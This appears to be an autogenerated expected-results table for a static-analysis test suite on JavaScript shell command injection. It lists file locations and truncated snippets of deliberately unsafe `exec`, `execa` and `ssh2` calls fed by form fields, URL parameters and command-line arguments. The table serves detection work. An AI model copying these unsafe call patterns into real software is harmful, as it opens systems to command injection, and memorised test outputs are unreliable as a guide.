| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:41:5:41:32 | exec("t ... s.name) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:45:18:45:38 | require ... party') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:46:12:46:26 | require('http') |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:2 | http.cr ... q);\\n\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:48:1:63:15 | http.cr ... n(8080) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | form.pa ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exec("t ... s.name) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | form2.o ... OK\\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exec("t ... lename) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | form2.parse(req) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | require("http") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:2:11:2:24 | require("url") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:4:14:35:2 | http.cr ... T OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:5:15:5:38 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:26 | require ... spawn") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:7:5:7:36 | require ... nc(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:8:5:8:31 | require ... ll(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:9:5:9:35 | require ... nc(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:10:5:10:32 | require ... ut(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:11:5:11:32 | require ... rr(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:12:5:12:30 | require ... nc(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:26 | require ... spawn") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:14:5:14:31 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:32 | require ... async") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:15:5:15:37 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:19 | require("exec") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:16:5:16:24 | require("exec")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:25 | require ... async") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:17:5:17:30 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:18:5:18:25 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:26 | require ... -exec") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:19:5:19:39 | require ... t, cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:21:18:21:32 | require("ssh2") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:22:5:22:24 | new ssh2().exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:23:5:23:31 | new ssh ... ec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:25:24:25:46 | require ... reams") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:26:5:26:37 | new SSH ... e, cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:20 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:28:5:28:30 | require ... de(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:31 | require ... child") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:30:5:30:36 | require ... ")(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:32:20:32:36 | require("opener") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:5:33:70 | opener( ... y.user) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:35:33:58 | url.par ... , true) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:5:34:49 | opener( ... cmd }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:1:13:1:28 | require("https") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:2:10:2:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:4:1:8:1 | https.g ... })\\n) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:5:5:7:6 | res.on( ... \\n }) |
| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/third-party-command-injection.js:6:9:6:28 | cp.execSync(command) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:4:2:4:22 | cp.exec ... s.argv) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | cp.exec ... rgv[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | cp.exec ... rgv[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | cp.exec ... rgv[1]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:8:2:8:37 | cp.exec ... rgv[2]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | cp.execSync(args[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | cp.exec ... rgs[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:14:18:14:30 | args.slice(1) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:15:2:15:26 | cp.exec ... rgs[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:16:2:16:38 | cp.exec ... rgs[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:19:2:19:18 | cp.execSync(arg0) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:20:2:20:30 | cp.exec ... + arg0) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:24:15:24:35 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:25:17:25:56 | path.jo ... ex.js') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:26:2:26:51 | cp.exec ... tion"`) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:2:27:58 | cp.exec ... tion"`) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:27:32:27:45 | args.join(' ') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:1:30:51 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:44 | require ... -args") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:30:21:30:46 | require ... rgs")() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:1:31:46 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | require("minimist") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | require ... ist")() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | cp.exec ... gv.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | require("yargs") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | cp.exec ... gv.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | require("optimist") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:36:28 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:37:62 | require ... => { }) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:36:13:38:36 | require ... bar" }) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:41:2:41:26 | cp.exec ... + args) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:2:43:63 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:37 | require("yargs") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:50 | require ... ("foo") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:43:22:43:58 | require ... parse() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:51:21 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:52:26 | require ... o bar') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:51:6:53:12 | require ... mmand() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:2:55:26 | cp.exec ... + args) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:65:2:65:32 | cp.exec ... t1rest) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:66:2:66:32 | cp.exec ... t2rest) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:68:20:68:35 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:69:2:69:28 | cp.exec ... taint3) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:71:20:71:35 | require('yargs') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:72:2:72:28 | cp.exec ... taint4) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:76:15:76:35 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:78:17:78:35 | require("minimist") |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:2:79:40 | cp.exec ... v).foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:79:22:79:35 | minimist(argv) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:81:15:81:31 | require('subarg') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:2:82:55 | cp.exec ... )).foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:22:82:50 | subarg( ... ice(2)) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:82:29:82:49 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:84:20:84:42 | require ... arser') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:2:85:60 | cp.exec ... )).foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:22:85:55 | yargsPa ... ice(2)) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:85:34:85:54 | process ... lice(2) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:88:14:88:37 | args.pa ... s.argv) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:89:2:89:31 | cp.exec ... gs.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:27 | require('arg') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:91:14:91:38 | require ... .spec}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:92:2:92:31 | cp.exec ... gs.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:96:29:96:47 | require('argparse') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:100:2:100:56 | parser. ... bar' }) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:2:102:45 | cp.exec ... ().foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:102:22:102:40 | parser.parse_args() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:106:26:106:53 | require ... -args') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | command ... itions) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | cp.exec ... ns.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | require('meow') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:14:114:52 | meow(`h ... lags}}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:116:2:116:34 | cp.exec ... put[0]) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:120:17:120:35 | require('dashdash') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:122:13:122:46 | dashdas ... tions}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:124:2:124:30 | cp.exec ... ts.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:126:15:126:55 | dashdas ... tions}) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:127:13:127:26 | parser.parse() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:129:2:129:30 | cp.exec ... ts.foo) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:133:22:133:41 | require('commander') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:134:2:134:25 | program ... 0.0.1') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:2:136:46 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:136:22:136:35 | program.opts() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:137:2:137:39 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:141:22:141:41 | require('commander') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:143:2:143:25 | program ... 0.0.1') |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:2:145:46 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:145:22:145:35 | program.opts() |
| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:146:2:146:39 | cp.exec ... zaType) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:1:17:1:34 | require("express") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:2:13:2:21 | express() |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:3:22:3:45 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:5:1:47:2 | app.get ... / OK\\n}) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | execFil ... myArgs) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:17:7:17:29 | remote. ... h("--") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:18:5:18:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:5:20:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:23:7:23:31 | remote. ... "git@") |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:5:24:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | execFil ... HEAD"]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | execFil ... y.args) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:3:31:42 | execFil ... .args]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:3:33:66 | execFil ... gs()])) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:19:33:65 | ["add", ... rgs()]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:33:53:33:63 | otherargs() |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:3:35:78 | execFil ... rArgs)) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | ["ls-re ... erArgs) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | execFil ... rable)) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:3:42:48 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:44:3:44:32 | execFil ... y.args) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:3:46:51 | execFil ... emote]) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | execFile(cmd, args) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | app.lis ... 000!")) |
| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | console ... 3000!") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | require ... ocess') |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | require('path') |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | require("execa") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:2:5:62 | cp.exec ... emp")]) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:2:6:54 | cp.exec ... temp")) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:2:8:54 | execa.s ... temp")) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | execa.s ... temp")) |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:22:11:49 | path.jo ... "temp") |
| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:12:2:12:34 | execa.s ... + safe) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:8:2:8:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:10:1:33 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:4:2:4:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:6:2:6:26 | cp.exec ... [name]) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:7:2:7:24 | cp.exec ... , name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:11:2:11:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:15:2:15:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:27:2:27:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:31:23:31:42 | require("./lib2.js") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:35:3:35:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:38:3:38:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:41:3:41:27 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:43:3:43:33 | cp.exec ... Source) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:28 | require ... ocess") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:2:50:51 | require ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:55:2:55:14 | cp.exec(cmd1) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:59:3:59:14 | cp.exec(cmd) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | cp.exec(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | cp.exec ... a end") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:71:2:71:32 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:75:2:75:30 | cp.exec ... + "'") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:2:77:38 | cp.exec ... + "'") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | cp.exec ... file") |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:83:2:83:26 | cp.exec ... + name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | args1.push(name) |
| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) |
